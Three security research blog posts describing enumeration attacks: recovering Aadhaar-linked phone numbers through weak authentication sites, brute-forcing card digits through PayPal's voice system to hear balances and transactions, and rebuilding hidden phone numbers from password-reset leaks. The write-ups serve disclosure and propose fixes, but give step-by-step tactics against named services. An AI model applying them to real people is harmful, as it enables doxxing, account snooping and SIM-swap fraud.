Extracting personal phone numbers linked to Aadhaar

Introduction

The purpose of this article is to demonstrate how the personal phone number linked to any given Aadhaar can be extrapolated due to problems in implementation of the text-based authentication mechanism which websites offering Aadhaar authentication rely on.

Websites which make use of text-based (OTP) Aadhaar authentication display to the user only the last four digits of the phone number linked to the provided Aadhaar. This is ostensibly a privacy safeguard put in place by the UIDAI to limit personally identifiable information from being revealed prior to authentication.

This privacy safeguard can be circumvented using websites which poorly implement text-based Aadhaar authentication, specifically, through websites which allow the user to input both the Aadhaar number as well as the verified phone number linked to the same.

If the provided phone number doesn’t match the verified phone number linked with the corresponding Aadhaar; the user is notified and has the ability to try again.


This flaw in implementation introduces a surface for computer-aided guessing and enumeration attacks which can be abused to reveal the entire phone number linked to a given Aadhaar.

Several websites were analyzed and tested for this article out of which three were found to be vulnerable to enumeration attacks which could be used to retrieve the complete phone number linked to an Aadhaar.

Obtaining the last four digits

The digilocker.gov.in website reveals the last four digits of linked phone number prior to successful authentication. This means that a user would simply have to input an Aadhaar number when signing up for DigiLocker and the last four digits of the linked phone number would then be displayed.

digilocker.gov.in

It should be clarified that DigiLocker is one of many websites which can be used to retrieve the last four digits of the Aadhaar-linked phone number. It should also be clarified that the websites mentioned in this post were selected for no reasons other than their general availability.

Another website which was found to share the characteristic of disclosing the last four digits was nfsm.gov.in – where after entering an Aadhaar number the last four digits of the phone number linked to it were displayed.

nfsm.gov.in

While most sites were found to have properly implemented text-based Aadhaar authentication, several other websites – both in the public and private sector – were found to be susceptible to the implementation flaws and vulnerabilities mentioned earlier.

Obtaining the first six digits

The Indian mobile telephone numbering system defines that the first digit of a mobile phone number can (currently) only be one of the following: nine (9), eight (8) or seven (7).

This information will prove to be immensely useful during the enumeration process as it allows for eliminating the entire number space for numbers 1-6 when going through combinations of possible phone numbers.

Let us say that the following partial phone number is retrieved from DigiLocker or any other website which performs Aadhaar authentication:

Here, the digits which are not currently known are represented using X, and the digits which are known are represented using Y.

Simply for the sake of convenience; the enumeration process should ideally begin from the 9XXX series of phone numbers, as it is the most populated mobile telephone number series in India.

Discovery of the five unknown digits can be automated with the use of a script, or through an intercepting proxy such as the OWASP Zed Attack Proxy – which features a tool to send automated requests to a web server with a given set of payloads.

(In this context, the term payload refers to the entire five digit number space which contains all numbers ranging from 00000 to 99999)

To reiterate; the script or tool would query any of the vulnerable websites repeatedly to extract the full phone number pertaining to any given Aadhaar.

The video below demonstrates this process through the use of Burp Suite – which is another intercepting proxy capable of sending automated requests.

In the video above, the valid phone number combination can be distinguished on the basis of its response length. A response length of 8081 signifies a match, as opposed to a response length of 1389 or 1375 which signifies an authentication failure.

If no valid results are found in the 9XXX series of phone numbers, enumeration could then be carried out on the 8XXX and 7XXX number series respectively – until a match has been found.

In most cases – a positive match should be found in the 9XXX series simply due to its size – but this ultimately depends on several factors such as the state where the phone number in question was issued, cellular carrier (as well as whether the number has been ported to another carrier) and others.

An attack like the one described in this post would take around 17 minutes for each number series – given that there are 100 requests each second, or 6000 per minute. It would take 17 minutes in total for each number series to be exhausted with 99,999 possible combinations in each.

This means that exhausting all current number series (9XXX, 8XXX, 7XXX) would take around 51 minutes with the above-mentioned conditions.

NOTE: A text-message containing a one-time-pin for Aadhaar authentication is sent to the linked phone number as soon as a match is found.

Possible fixes

The masking scheme used in the authentication process could be strengthened by disclosing only the least number of digits needed to verify the correctness of the linked phone number.

An example of such a masking scheme could be something similar to this:

A masked phone number like the one displayed above would hinder attempts at enumeration and/or guessing while still allowing for verification of the correctness of the linked phone number.

Conclusion

A new attack surface is introduced when websites which make use of Aadhaar authentication allow users to enter an Aadhaar number as well as the phone number linked to the same. Any website which shares this characteristic could potentially be abused in such a way which allows for accurate deduction of the phone number linked to a given Aadhaar.

The privacy implications of being able to map an Aadhaar number to its corresponding phone number are grave – as a lot can become known about a person given their phone number, such as their full name through a reverse lookup, their social media profiles through ‘Find your friends’ features on social media websites, and more information which one should not be able to glean from a 12 digit UID.

Additionally, knowledge of a phone number and the Aadhaar card number to which it is linked could be used by malicious parties to aid SIM swap attacks, phishing schemes and other illicit activities which require knowledge of the same.

PayPal: Disclosure of account balance and recent transactions

Introduction

This post details an issue which allows for enumeration of the last four digits of payment method (such as a credit or debit card) and for the disclosure of account balance and recent transactions of any given PayPal account.

This attack was submitted to PayPal’s bug bounty program where it was classified as being out of scope, which is something that would admittedly be unavailing to refute, since their program scope does not mention anything about attacks on their interactive voice response system.

The issue still exists as of February 24, 2018.

Prerequisites and Reconnaissance

In order to get started, the attacker would require knowledge of two pieces of information pertaining to an account, which would be the e-mail address and phone number linked to it.

Armed with knowledge of the e-mail address and phone number linked to an account, the attacker would visit the Forgot Password page on PayPal’s website, and enter the e-mail address associated with the targeted account.

The attacker would then be presented with the type of card linked to the account, as well as the last two digits of the same.

PayPal - Forgot Password

Attacking the Interactive Voice Response System

On first glance, the interactive voice response system on PayPal’s phone-based customer support seemingly allows for a maximum of three attempts at submitting the correct last four digits per phone call.

However, if the first attempt at submission is incorrect, the caller will not be notified of a successful submission in subsequent attempts made during the same phone call. This makes any additional attempts given to a caller during the same phone call completely cosmetic.

To get around this presumed limitation, the attacker would have to make only one attempt at submitting a possible combination of the last four digits per phone call.

PayPal - Customer Support

Additionally, limiting the number of attempts to one submission per phone call makes the task of enumerating the correct combination much more time-efficient, and not to mention, it allows for easily distinguishing between a correct attempt and an incorrect one.

Furthermore, upon have tested this theory with my own account, I have been able to conclude that there is no limit on the number of submission attempts which can be made in this manner, meaning that hypothetically, an attacker could even call 10,000 times to enumerate the last four digits entirely on their own.

That would, however, be disregarding the last two digits retrieved from the Forgot Password page, the knowledge of which effectively makes the attack much more feasible–by reducing the number of possible combinations from 10,000 to just 100.

Once the correct combination of the last four digits has been found, the attacker would simply have to use the interactive voice response system to retrieve information about the account.

After having entered the correct last four digits, the account’s current balance will automatically read off by the machine.

Additionally, to retrieve information about recent transactions, an attacker would simply have to say “recent transactions”, and the same would then be read off.

Attack Efficacy and Efficiency

If the aforementioned prerequisites have been met, an attacker would without fail have the ability to enumerate the correct last four digits of the payment method linked to an account. This information could then further be used to retrieve the account’s current balance and recent transactions as well.

Moreover, after having timed various attempts at submission of the last four digits, it was found that an attempt at submission would on average take around 30 seconds. The fastest possible time was found to be exactly 27 seconds per phone call.

If we take the fastest possible time as our average, enumerating all possible combinations from 00XX to 99XX would take at most around 45 minutes. This time could then be halved by adding another phone in the mix to consecutively make calls with.

Possible Fixes

Users should be allowed to opt for privacy settings which keep the amount of data revealed on the Forgot Password page to a minimum. This would be similar to how Twitter allows its users to hide information about the email address and/or phone number linked to their account when attempting to reset its password.

It would also be similar to how Facebook allows users to choose whether their full names show up or not when their e-mail address is entered on the password reset page.

Perhaps some measures could be deployed where the last two digits of credit or debit card, if they need to be shown at all, are only shown when the request matches a certain criteria, such as if/when the request has been made from a recognizable device or location.

Conclusion

This issue allows for enumeration of the last four digits of the payment method on an account, which then allows for the disclosure of the account’s current balance and recent transactions.

An attacker with knowledge of the targeted account’s email address and phone number would first use PayPal’s Forgot Password page to retrieve the last two digits of the payment method linked to the account.

The attacker would then be able to accurately enumerate the last four–or rather the first two of the last four digits–of the payment method on the account by making phone calls to PayPal’s phone-based customer support and interacting with the interactive voice response system.

Once the attacker has successfully enumerated the last four digits of credit/debit card or bank account linked to the account, they would then be able to query the current account balance and recent transaction information at will.

I would like to mention that since there is no human interaction required or involved in this attack, it is essentially a backdoor into PayPal accounts–allowing attackers to query current account balance and recent transaction information of any given account, at any time.

Fuzzing for obfuscated phone numbers

Introduction

In the current age of information, any technology you own could potentially be used as an avenue for attack, including your mobile phone.

In writing and publishing this piece, I am hoping to highlight the risk of linking a single invariable phone number across all of your online accounts, and how doing so could easily allow for an adversary to derive your personal phone number, and then use it to carry out attacks which require knowledge of the same.

The potential threat posed by someone knowing your phone number might seem trivial at most, until existence of vulnerabilities such as one that had recently affected T-Mobile are taken into account.

In the case of the previously mentioned vulnerability, an attacker could have used it to query sensitive, personally identifiable information of any T-Mobile subscriber by knowing just their phone number.

The data which was being leaked included information such as—account number, status and creation date, SIM IMSI number, e-mail address, encrypted security question answers, as well as details about when the account password was last changed.

Furthermore, the accumulated information could then be used to aid what is called a ‘SIM swap’ attack, which allows attackers to gain access to and have complete control over a person’s mobile phone number, including all incoming and outgoing communication (calls, text messages and voicemail).

Reconnaissance

This post was written with regard to the fictional target being from the United States, but based on context, it could very easily be adapted to work with persons from another country.

The attacker would need to determine the location of the target from their online presence.

This part is extremely easy, as most people reveal their current city on their Facebook page. However, if this information is not listed on their social media profiles, it would have to be gathered from other publicly available sources. The attacker would also require knowledge of the target’s e-mail address.

Once the prerequisites have been met, the attacker would head over to the ‘Forgot password’ page on Facebook or Twitter, and submit the email address or username of the target.

If the submitted e-mail address or username corresponds to an existing account, the attacker would be presented with the last two digits of the phone number linked to it.

The attacker would then head over to PayPal’s website for more information regarding the phone number.

The process here is similar—the attacker would enter the e-mail address of the target on the ‘Having trouble logging in?’ page and use the response to add to the currently incomplete phone number.

A look at the target’s social media profiles allows for a conclusion to be made about their current city of residence, which in this case is: New York, USA.

The attacker then looks through the assigned area codes for the city and finds that only one area code starts with the digit ‘3’—which, if you remember, matches the first one digit earlier retrieved from PayPal.

This information allows the attacker to confirm the first three digits of the phone number.

The attacker would now have to parse a list of all possible phone number prefixes (which would be the three digits following the area code) and adjoin them with the partially obfuscated phone number currently known.

Lastly, the attacker would have to manually submit and check off phone numbers from the compiled list, until either the full name of the target has been returned, or distinctive characteristics which are most likely to match the originally provided e-mail address have been identified.

It is possible to automate this part of the process, but it usually would not be needed as the list of possible phone numbers shouldn’t be too long to begin with.

Success! The previously obfuscated phone number is now fully known.

It is also possible to further verify whether the retrieved phone number belongs to the target (or not), by using various open source intelligence techniques.

For instance, unless you have explicitly disabled a certain privacy setting on Facebook, your full name and profile picture are displayed to anyone who submits your e-mail address or phone number on the ‘Forgot password’ page.

Another technique is to use Google’s ‘Forgot email?’ page, which allows you to submit a name and phone number to see if there is a corresponding Google account linked with the same.

Conclusion

The attacker would initially use Twitter or Facebook to gather information about the target’s location and to retrieve the last two digits of the target’s phone number.

PayPal would then be used to retrieve the first one and last four digits of the phone number. The last four digits retrieved from PayPal would help conclusively verify whether the last two digits retrieved from Facebook were accurate and up-to-date.

The target’s general location and previously retrieved first one digit would then be used to make an educated guess about the area code (first three digits) of the phone number in question.

The phone number prefixes (which are the three digits following the area code) would be parsed into a list of possible phone numbers belonging to the target, with number prefixes ranging from 200-999.

The exact phone number would then be confirmed by submitting phone numbers from the compiled list to the ‘Forgot password’ page on Facebook, and looking for when the full name of the target is returned, or when distinctive characteristics—such as an unusual e-mail address domain are found to match with the originally provided e-mail address.

The websites mentioned in this report play an pivotal part in allowing for extrapolation of obfuscated phone numbers, however, it should be noted that the sites mentioned are only two from a list of several other popular websites which pave way for the same end result.

For example, Yahoo! gives away the first and last two digits of the phone number when attempting to reset an account password.

The general public can combat part of the issue by using varying phone numbers when signing up for different online services, and by refraining from providing personal phone numbers to websites that reveal partial phone number information on their password reset pages.

Update: April 11, 2018 – An earlier version of this article appears in the Spring 2018 issue (Volume 35-1) of 2600 Magazine.

This article was originally published on June 29, 2017. It was then taken down and republished on January 11, 2018.